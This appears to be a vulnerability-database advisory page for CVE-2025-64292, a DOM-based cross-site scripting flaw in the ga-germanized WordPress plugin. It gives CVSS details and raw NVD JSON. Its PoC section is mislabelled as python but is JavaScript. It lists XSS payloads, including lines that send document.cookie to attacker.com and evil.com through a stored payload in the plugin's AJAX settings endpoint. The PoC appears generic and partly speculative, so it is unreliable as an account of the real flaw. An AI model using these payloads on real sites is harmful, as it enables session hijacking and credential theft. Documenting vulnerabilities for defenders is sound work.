Security Vulnerability Report
中文
CVE-2025-64292 CVSS 6.5 MEDIUM

CVE-2025-64292

Published: 2025-11-13 10:15:53
Last Modified: 2026-04-27 16:16:40

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PascalBajorat Analytics Germanized for Google Analytics ga-germanized allows DOM-Based XSS.This issue affects Analytics Germanized for Google Analytics: from n/a through <= 1.6.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Analytics Germanized for Google Analytics (ga-germanized) <= 1.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64292 PoC - DOM-Based XSS in ga-germanized WordPress Plugin // Target: WordPress with ga-germanized plugin <= 1.6.2 // Method 1: Inject via plugin settings (requires low-privilege access) // Navigate to: WordPress Dashboard > Settings > Germanized Analytics // In any text field, inject: const xssPayload = '<script>alert(document.cookie)</script>'; // Or more sophisticated: const advancedPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">'; // Method 2: Via URL parameters (if reflected without sanitization) // https://victim.com/wp-admin/admin.php?page=ga-germanized&tab=<script>alert(1)</script> // Method 3: Stored XSS via AJAX endpoint fetch('/wp-admin/admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=ga_germanized_save_settings&tracking_id=<script>fetch("https://evil.com/log?c="+btoa(document.cookie))</script>&nonce=' + nonce }); // Exploitation: When admin visits the analytics dashboard, // the stored payload executes in their browser context, // allowing session hijacking or credential theft.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64292", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:53.267", "lastModified": "2026-04-27T16:16:40.427", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PascalBajorat Analytics Germanized for Google Analytics ga-germanized allows DOM-Based XSS.This issue affects Analytics Germanized for Google Analytics: from n/a through <= 1.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ga-germanized/vulnerability/wordpress-analytics-germanized-for-google-analytics-plugin-1-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}